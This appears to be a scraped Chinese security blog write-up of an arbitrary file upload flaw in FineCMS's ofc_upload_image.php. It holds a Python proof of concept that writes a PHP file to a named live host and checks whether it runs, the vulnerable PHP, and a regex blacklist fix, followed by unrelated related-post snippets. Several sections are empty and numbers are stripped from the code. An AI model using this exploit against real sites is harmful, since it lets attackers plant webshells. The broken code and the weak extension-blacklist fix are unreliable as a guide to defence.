catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2015-0105251


2. 漏洞触发条件

0x1: POC

#!/usr/bin/env python

# -*- coding: utf- -*-

#__author__ = '1c3z' 

import urllib2

import random

fileName = "shell" + str(random.randrange(,)) + ".php"

target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php" 

def uploadShell():

    url = target + "?name=" + fileName

    req = urllib2.Request(url, headers={"Content-Type": "application/oct"})

    res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")

    return res.read()

def poc():

    res = uploadShell()

    if res.find("tmp-upload-images") == -:

        print "Failed !"

        return

    print "upload Shell success"

    url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName

    md5 = urllib2.urlopen(url).read()

    if md5.find("e369853df766fa44e1ed0ff613f563bd") != -:

        print "poc: " + url 

poc()


3. 漏洞影响范围
4. 漏洞代码分析

/dayrui/libraries/Chart/ofc_upload_image.php

$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, , true);

$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;

$jfh = fopen($destination, 'w') or die("can't open file");

fwrite($jfh, $HTTP_RAW_POST_DATA);

fclose($jfh);

程序未对上传文件进行任何后缀、内容的检测和过滤


5. 防御方法

/dayrui/libraries/Chart/ofc_upload_image.php

$default_path = '../tmp-upload-images/';

if (!file_exists($default_path))

    mkdir($default_path, , true);

$destination = $default_path . basename( $_GET[ 'name' ] ); 

/* */

if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#i', trim($destination)))

{

    die("你指定的文件名被系统禁止!");

}

/* */

echo 'Saving your image to: '. $destination;

$jfh = fopen($destination, 'w') or die("can't open file");

fwrite($jfh, $HTTP_RAW_POST_DATA);

fclose($jfh);


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul的更多相关文章

  1. [EXP]Adobe ColdFusion 2018 - Arbitrary File Upload

    # Exploit Title: Unrestricted # Google Dork: ext:cfm # Date: -- # Exploit Author: Pete Freitag of Fo ...

  2. Fckeditor PHP/ASP File Upload Vul

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScrip ...

  3. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  4. CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server

    CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server Severity: Medium Vendor: ...

  5. 【转发】Html5 File Upload with Progress

    Html5 File Upload with Progress               Posted by Shiv Kumar on 25th September, 2010Senior Sof ...

  6. jQuery File Upload 单页面多实例的实现

    jQuery File Upload 的 GitHub 地址:https://github.com/blueimp/jQuery-File-Upload 插件描述:jQuery File Upload ...

  7. jQuery File Upload done函数没有返回

    最近在使用jQuery File Upload 上传图片时发现一个问题,发现done函数没有callback,经过一番折腾,找到问题原因,是由于dataType: ‘json’造成的,改为autoUp ...

  8. kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸

    kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸

  9. 用jQuery File Upload做的上传控件demo,支持同页面多个上传按钮

    需求 有这么一个需求,一个form有多个文件要上传,但又不是传统的图片批量上传那种,是类似下图这种需求,一开始是用的swfupload做的上传,但是问题是如果有多个按钮的话,就要写很多重复的代码,于为 ...

随机推荐

  1. MyBatis.Net 学习手记

    MyBatis.NET的前身为IBatis,是JAVA版MyBatis在.NET平台上的翻版,相对NHibernate.EntityFramework等重量级ORM框架而言,MyBatis.NET必须 ...

  2. RMQ(ST算法)

    RMQ(Range Minimum/Maximum Query),即区间最值查询,是指这样一个问题:对于长度为n的数列a,回答若干询问RMQ(A,i,j)(i, j<=n),返回数列a中下标在i ...

  3. ArcGIS支持MongoDB数据源

    ArcGIS支持MongoDB数据源 自从NoSQL推出之后,MongoDB就作为比较杰出的代表受到广大用户的推崇,当然,与之而来的大数据的讨论也非常激烈,GIS数据源向来都是以海量来计算,所以,GI ...

  4. learning to rank

    Learning to Rank入门小结 + 漫谈 Learning to Rank入门小结 Table of Contents 1 前言 2 LTR流程 3 训练数据的获取4 特征抽取 3.1 人工 ...

  5. BroadcastReceiver之有序广播

    有序广播可以按一定的优先级进行传播 首先进行发送广播 public void click(View v){ Intent intent = new Intent(); intent.setAction ...

  6. No goals have been specified for this build

    在pom.xml文件中build后面加上<defaultGoal>compile</defaultGoal>

  7. c++中STL库简介及使用说明

    作为C++标准不可缺少的一部分,STL应该是渗透在C++程序的角角落落里的.STL不是实验室里的宠儿,也不是程序员桌上的摆设,她的激动人心并非昙花一现.本教程旨在传播和普及STL的基础知识,若能借此机 ...

  8. directly receive json data from javascript in mvc

    if you send json data to mvc,how can you receive them and parse them more simply? you can do it like ...

  9. android 按钮点击效果实现

    在其他人的博客里看到其实实现按钮点击效果的方法有很多,这里提到的只是其中一个办法 图片素材(我自己用截图截的,可以自己搞) 放到mipmap目录下(studio是在这个目录下 , eclipse 直接 ...

  10. Python:no encoding declared 错误

    使用Python编译的时候出现如下错误: SyntaxError: Non-ASCII character ‘\xe5’ in file magentonotes.com.py on line 2, ...